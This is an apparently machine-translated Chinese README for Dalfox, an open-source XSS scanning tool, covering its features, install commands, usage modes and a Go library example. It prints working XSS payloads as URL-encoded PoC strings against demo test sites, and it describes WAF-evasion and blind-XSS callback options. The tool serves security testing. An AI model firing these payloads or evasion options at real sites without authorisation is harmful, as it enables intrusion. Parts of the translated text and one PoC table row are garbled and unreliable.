dalfox
v2.9.3
Dalfox是一种强大的开源工具,专注于自动化,非常适合快速扫描XSS缺陷和分析参数。其先进的测试引擎和利基特征旨在简化检测和验证漏洞的过程。
至于这个名字,dal(달)是朝鲜语“月亮”的单词,而“福克斯”代表“ XSS的Finder”还是?
模式: url sxss pipe file server payload
| 班级 | 关键功能 | 描述 |
|---|---|---|
| 发现 | 参数分析 | - 查找反映的参数 - 查找活着/不良特殊字符,活动处理程序和攻击代码 - 注射点(HTML/JS/属性)的识别 inHTML-none inJS-none inJS-double inJS-single inJS-backtick inATTR-none inATTR-double inATTR-single |
| 静态分析 | - 检查csp,xfo等的坏头。 | |
| BAV分析 | - 测试BAV(基本的另一个漏洞),例如sqli ssti open-redirects , crlf , esii | |
| 参数挖掘 | - 在字典攻击中找到新的参数(默认是GF-Patterns) - 支持自定义词典文件( --mining-dict-word )- 与DOM一起找到新参数 - 使用远程文字列表到采矿( --remote-wordlists ) | |
| 内置的格雷普 | - 它标识SSTI,凭据,SQL错误等的基本信息泄漏等等 | |
| WAF检测和逃避 | - 检测到WAF(Web应用程序防火墙)。 - 如果找到WAF并使用特殊标志,请使用缓慢的要求逃避 - --waf-evasion | |
| 扫描 | XSS扫描 | - 反射XSS /存储的XSS / DOM XSS - DOM基础验证 - 无头基验证 - 用参数,标头( -b , --blind选项)进行盲XSS测试- 仅测试选定的参数( -p , --param )- 仅测试参数分析( --only-discovery ) |
| 友好管道 | - 单个URL模式( dalfox url )- 从文件模式( dalfox file urls.txt )- 来自IO(管道)模式( dalfox pipe )- 来自RAW HTTP请求文件模式( dalfox file raw.txt --rawdata ) | |
| 有效载荷的优化查询 | - 通过抽象检查注射点并产生适合有效载荷。 - 基于BadChar消除不必要的有效载荷 | |
| 编码器 | - 所有测试有效载荷(内置,您的自定义/盲人)均与编码器并联测试。 - 双URL编码器 - 到HTML十六进制编码器 | |
| 顺序 | - 自动检查存储的XSS( --trigger )的特殊页面- 支持( --sequence )存储的XSS选项,仅sxss模式 | |
| http | HTTP选项 | - 覆盖HTTP方法( -X , --method )- 遵循重定向( --follow-redirects )- 添加标头( -H , --header )- 添加cookie( -C , --cookie )- 添加用户代理( --user-agent )- 设置超时( --timeout )- 设置延迟( --delay )- 设置代理( --proxy )- 设置忽略返回代码( --ignore-return )- 从原始请求加载cookie( --cookie-from-raw ) |
| 并发 | 工人 | - 设置工人的号码( -w , --worker ) |
| n *主机 | - 使用多播模式( --multicast ),仅使用file / pipe模式 | |
| 输出 | 输出 | - 只有POC代码和有用的信息作为Stdout写 - 保存输出( -o , --output ) |
| 格式 | -JSON / PLAIN( --format ) | |
| 印刷 | - 沉默模式( --silence )- 您可以选择不打印颜色( --no-color )- 您可以选择不打印旋转器( --no-spinner )- 您可以选择仅显示特殊的POC代码( --only-poc ) | |
| 报告 | - 显示详细报告( --report和--report-format=<plain/json> ) | |
| 可扩展性 | REST API | -API服务器和Swagger( dalfox server ) |
| 有效载荷模式 | - 生成XSS测试的有效载荷( dalfox payload ) | |
| 找到了行动 | - 允许您指定检测时要采取的动作。 - 例如(例如 - --found-action ) | |
| 自定义Grepping | - 可以在响应时使用自定义的正则表达方式 - 如果重复检测,它将执行重复数据删除( --grep ) | |
| 自定义有效载荷 | - 使用自定义有效载荷列表文件( --custom-payload )- 自定义警报值( --custom-alert-value )- 自定义警报类型( --custom-alert-type ) | |
| 远程有效载荷 | - 使用PortSwigger, --remote-payloads载箱等远程有效载荷等。 | |
| 包裹 | 软件包管理器 | -pkg.go.dev - 用水龙头的自制 - 快照 |
| Docker Env | - Docker Hub -Docker的Github包裹 | |
| 其他 | - github动作 |
以及测试所需的各种选项:D
brew install dalfox
# https://formulae.brew.sh/formula/dalfox sudo snap install dalfox
go install github.com/hahwul/dalfox/v2@latest
# The actual release might slightly differ. This is because go install references the main branch.更多信息?请阅读安装指南
dalfox [mode] [target] [flags]
单个目标模式
dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff
-b https://your-callback-url文件中的多个目标模式
dalfox file urls_file --custom-payload ./mypayloads.txt管道模式
cat urls_file | dalfox pipe -H " AuthToken: bbadsfkasdfadsf87 "其他提示,有关详细说明,请参见Wiki!
样品POC日志
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
格式
| 身份 | 类型 | 信息 | 空白的 | POC代码 |
|---|---|---|---|---|
| POC | g | 内置/dalfox-error-mysql/get | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123Dalfox | |
| POC | r | 得到 | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%22%3E%3E%3CSVG%2FCLASS%222222DALFOX; | |
| POC | v | 得到 | http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%22%3E%3E%3CSVG%2FCLASS%222222DALFOX; |
G (GREP), R (反映), V (验证)为什么有差距?这是一种使仅通过剪切等解析POC代码更容易的方法。例如,您可以执行此操作。
dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff
| cut -d " " -f 2 > output
cat output
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E package main
import (
"fmt"
dalfox "github.com/hahwul/dalfox/v2/lib"
)
func main () {
opt := dalfox. Options {
Cookie : "ABCD=1234" ,
}
result , err := dalfox . NewScan (dalfox. Target {
URL : "https://xss-game.appspot.com/level1/frame" ,
Method : "GET" ,
Options : opt ,
})
if err != nil {
fmt . Println ( err )
} else {
fmt . Println ( result )
}
}go build -o xssapp ; ./xssapp
# [] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477} |
展开
相关应用
为您推荐
|
|---|